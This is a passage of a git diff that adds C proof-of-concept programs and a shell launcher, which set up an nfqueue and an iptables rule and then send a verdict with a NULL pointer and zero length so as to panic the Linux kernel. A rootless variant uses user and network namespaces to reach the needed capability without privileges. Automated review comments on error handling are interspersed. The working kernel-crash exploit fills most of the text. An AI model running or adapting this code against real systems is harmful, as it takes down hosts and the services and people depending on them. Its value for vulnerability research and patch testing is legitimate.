the nfqueue %d\n", queue_num); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); + exit(EXIT_FAILURE); + } + + puts("[*] Setting config to COPY_META mode"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff); + mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO)); + mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO)); + if (mnl_socket_sendto(nl, nlh, 
nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); + exit(EXIT_FAILURE); + } + + puts("[*] Linking the nfqueue to a real connection through iptables"); + char cmd[200]; + sprintf(cmd, "iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d\n", queue_num); + if (system(cmd) != 0) + { + perror("system"); + exit(EXIT_FAILURE); + } + + puts("[*] Sending a connection packet to nfqueue"); + socket_conn(1337); + + puts("[*] Waiting for a packet in the nfqueue"); + if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) + { + perror("mnl_socket_recvfrom"); + exit(EXIT_FAILURE); + } + + puts("[*] Sending the verdict with a NULL pointer and len = 0"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); + nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); + nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT); + + puts("[*] Sending the verdict to the kernel, Good panic :D"); + sleep(1); // Only to see the print + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); + exit(EXIT_FAILURE); + } + + puts("[*] Are you still alive? Probably your kernel is not vulnerable :("); + return EXIT_SUCCESS; +} diff --git a/panic6_rootless.c b/panic6_rootless.c new file mode 100644 index 0000000..2ab6835 --- /dev/null +++ b/panic6_rootless.c 
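Review bot: The `if (system(cmd) != 0)` branch in panic6_podman.c's main reports the failure with `perror("system")`, but when iptables itself fails, system() returns the command's wait status and errno is not meaningful, so the printed message has nothing to do with the real cause. Keep the status and print it: `int rc = system(cmd);` followed by `fprintf(stderr, "iptables failed, status %d\n", rc);`. In the same block `sprintf` into `cmd[200]` is better written as `snprintf(cmd, sizeof cmd, ...)`, and the trailing `\n` inside the command string is not needed. Both `system()` checks in panic6_rootless.c use the same perror pattern. The header comment still reads `cc panic6.c ...`; it should name this file and say that iptables has to be present at runtime.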
@@ -0,0 +1,161 @@ +#define _GNU_SOURCE +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +// How to compile: +// cc panic6.c -o nfpanic -lmnl -lnetfilter_queue && sudo setcap "CAP_NET_ADMIN+ep" ./nfpanic && ./nfpanic + +int socket_conn(uint16_t port) +{ + int sockfd, connfd; + struct sockaddr_in servaddr, cli; + + // socket create and verification + sockfd = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0); + if (sockfd == -1) + { + perror("socket creation failed"); + exit(EXIT_FAILURE); + } + bzero(&servaddr, sizeof(servaddr)); + + // assign IP, PORT + servaddr.sin_family = AF_INET; + servaddr.sin_addr.s_addr = inet_addr("127.0.0.1"); + servaddr.sin_port = htons(port); + + // connect the client socket to server socket + connect(sockfd, (struct sockaddr *)&servaddr, sizeof(servaddr)); + return sockfd; +} + +void write_file(const char *fn, char *content) +{ + FILE *fptr; + + // use appropriate location if you are using MacOS or Linux + fptr = fopen(fn, "w"); + + if (fptr == NULL) + { + perror("Set user namespace failed!"); + exit(EXIT_FAILURE); + } + + fprintf(fptr, "%s", content); + fclose(fptr); +} + +int main(int argc, char *argv[]) +{ + + uid_t user = geteuid(); + uid_t group = getegid(); + + puts("[*] Creating a network namespace"); + if (unshare(CLONE_NEWUSER | CLONE_NEWNET) != 0) + { + perror("unshare"); + } + + puts("[*] Becoming 'root' in the namespace"); + char tmp_buf[50]; + sprintf(tmp_buf, "0 %d 1", user); + write_file("/proc/self/uid_map", tmp_buf); + write_file("/proc/self/setgroups", "deny"); + sprintf(tmp_buf, "0 %d 1", group); + write_file("/proc/self/gid_map", tmp_buf); + + puts("[*] Enabling loopback inferface in the namespace"); + if (system("./ld-linux.so.1 ./ip link set dev lo up") != 0) + { + perror("ip link set dev lo up"); + exit(EXIT_FAILURE); + } + + size_t BUF_SIZE = 0xffff + (MNL_SOCKET_BUFFER_SIZE / 2); + char buf[BUF_SIZE]; + uint16_t 
queue_num = 1337; + struct nlmsghdr *nlh; + + puts("[*] Creating the socket with the kernel"); + struct mnl_socket *nl = mnl_socket_open(NETLINK_NETFILTER); + if (nl == NULL) + { + perror("mnl_socket_open"); + exit(EXIT_FAILURE); + } + puts("[*] Binding the socket"); + if (mnl_socket_bind(nl, 0, MNL_SOCKET_AUTOPID) < 0) + { + perror("mnl_socket_bind"); + exit(EXIT_FAILURE); + } + + printf("[*] Sending the BIND command for the nfqueue %d\n", queue_num); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_cmd(nlh, AF_INET, NFQNL_CFG_CMD_BIND); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); + exit(EXIT_FAILURE); + } + + puts("[*] Setting config to COPY_META mode"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_CONFIG, queue_num); + nfq_nlmsg_cfg_put_params(nlh, NFQNL_COPY_META, 0xffff); + mnl_attr_put_u32(nlh, NFQA_CFG_FLAGS, htonl(NFQA_CFG_F_GSO)); + mnl_attr_put_u32(nlh, NFQA_CFG_MASK, htonl(NFQA_CFG_F_GSO)); + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) + { + perror("mnl_socket_send"); + exit(EXIT_FAILURE); + } + + puts("[*] Linking the nfqueue to a real connection through iptables"); + char cmd[300]; + sprintf(cmd, "./ld-linux.so.1 ./iptables -t mangle -A PREROUTING -j NFQUEUE -p tcp --dport 1337 --queue-num %d", queue_num); + if (system(cmd) != 0) + { + perror("iptables"); + exit(EXIT_FAILURE); + } + + puts("[*] Sending a connection packet to nfqueue"); + socket_conn(1337); + puts("[*] Waiting for a packet in the nfqueue"); + if (mnl_socket_recvfrom(nl, buf, BUF_SIZE) == -1) + { + perror("mnl_socket_recvfrom"); + exit(EXIT_FAILURE); + } + + puts("[*] Setting the verdict with a NULL pointer and len = 0"); + nlh = nfq_nlmsg_put(buf, NFQNL_MSG_VERDICT, queue_num); + nfq_nlmsg_verdict_put_pkt(nlh, NULL, 0); + nfq_nlmsg_verdict_put(nlh, 1, NF_ACCEPT); + + puts("[*] Sending the verdict to the kernel, Good panic :D"); + sleep(1); // Only to see the print + if (mnl_socket_sendto(nl, nlh, nlh->nlmsg_len) < 0) 
+ {
+ perror("mnl_socket_send");
+ exit(EXIT_FAILURE);
+ }
+
+ puts("[*] Are you still alive? Probably your kernel is not vulnerable :(");
+ return EXIT_SUCCESS;
+}
diff --git a/run.sh b/run.sh
new file mode 100755
index 0000000..86f9390
--- /dev/null
+++ b/run.sh
@@ -0,0 +1,18 @@
+#!/usr/bin/env bash
+
+cd "$(dirname "$0")"
+
+ARCH=$(uname -m)
+if [[ "$ARCH" == x86_64* ]]; then
+ cd amd64
+elif [[ "$ARCH" == aarch64* ]]; then
+ cd arm64
+else
+ echo "Unsupported architecture: $ARCH"
+ exit 1
+fi
+
+export XTABLES_LIBDIR=./xtables
+export LD_LIBRARY_PATH=./
+exec ./ld-linux.so.1 ./nfpanic
+
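Review bot: In panic6_rootless.c's main, a failed `unshare(CLONE_NEWUSER | CLONE_NEWNET)` only calls `perror("unshare")` and execution continues, so the uid_map writes and the bundled `ip` and `iptables` commands would then act on the caller's original namespaces instead of a throwaway one. Add `exit(EXIT_FAILURE);` after that perror, as every other error path in the function does. `write_file` also ignores the results of `fprintf` and `fclose`; the kernel rejects a bad map when the data is actually written, which with buffered stdio only shows up at `fclose`, so check it: `if (fclose(fptr) != 0) { perror(fn); exit(EXIT_FAILURE); }`. Smaller points: `group` should be declared `gid_t`, and the `"0 %d 1"` formats should be `%u` with a cast to `unsigned`.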
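Review bot: Neither `cd` in run.sh is checked, and the script then sets `LD_LIBRARY_PATH=./` and `XTABLES_LIBDIR=./xtables` relative to the current directory, so if a `cd` fails the loader and libraries are resolved from wherever the caller happened to be. Make the directory changes fatal with `cd "$(dirname "$0")" || exit 1` and `cd amd64 || exit 1` (same for arm64), or start the script with `set -euo pipefail`. Separately, the script executes prebuilt files (the loader, the shared libraries and presumably nfpanic) that this commit adds only as "Binary files ... differ" entries. A comment or README note stating how they were built, together with checksums, would let a reader verify them before running them.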